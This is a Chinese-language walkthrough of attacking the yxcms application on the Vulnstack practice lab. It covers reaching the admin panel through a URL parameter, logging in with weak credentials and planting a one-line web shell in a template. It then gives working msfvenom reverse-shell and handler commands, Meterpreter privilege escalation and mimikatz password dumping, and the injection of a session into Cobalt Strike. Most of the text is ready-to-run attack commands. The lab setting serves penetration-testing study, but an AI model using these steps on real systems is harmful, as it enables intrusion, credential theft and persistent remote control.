Vulnstack靶机学习一（下）

一、前言

　　这个是红日的一个靶机，http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

　　在信息搜集过程中发现MySQl文件下面还有个yxcms文件夹，这里通过这个yxcms get shell

二、Get Shell

访问http://192.168.157.138/yxcms/index.php 有一个登录界面，输入admin并不是后台，将member参数改为admin进入了后台登陆界面

 弱口令admin/123456进入后台

在前台模板里我们可以新建一个模板，但是路径不好找到。如果对http://192.168.157.138/yxcms/目录进行遍历

会发现新建的模板在http://192.168.157.138/yxcms/protected/apps/default/view/default/ 下面

基于路径问题可以直接对index_index.php进行修改，添加一句话，用蚁剑连接。

到这里如果用CS连接，后面就与上一篇一样了。为了说明一下msf给cs派生session，先用msf getshell。

msf生成木马：

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.157.137 lport=1234 -f exe > shell.exe

msf开启监听：

use exploit/multi/handler
set lhost 192.168.157.137
set lport 1234
set payload windows/meterpreter/reverse_tcp
exploit 

将生成的木马上传并运行，可以看到连接上了

meterpreter信息搜集：

get uid
getsystem
ps 查看有哪些进程
migrate PID 将进程迁移至正常服务内
load minikatz
mimikatz_command -f sekurlsa::searchPasswords 
minikatz_command -f sekurlsa::logonPasswords

派生sessoin

cs创建监听：

cs上面创建listener reverse_http 配置端口54321。注意cs和msf通讯端口和类型要一样

msf：

background
sessions
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set lhost 192.168.157.137
set lport 54321
set session 1
exploit

可以看到cs上线了一台机器，至此msf派生了session至cs。

剩余的与上一篇就一样了，里面还有很多点没有利用到。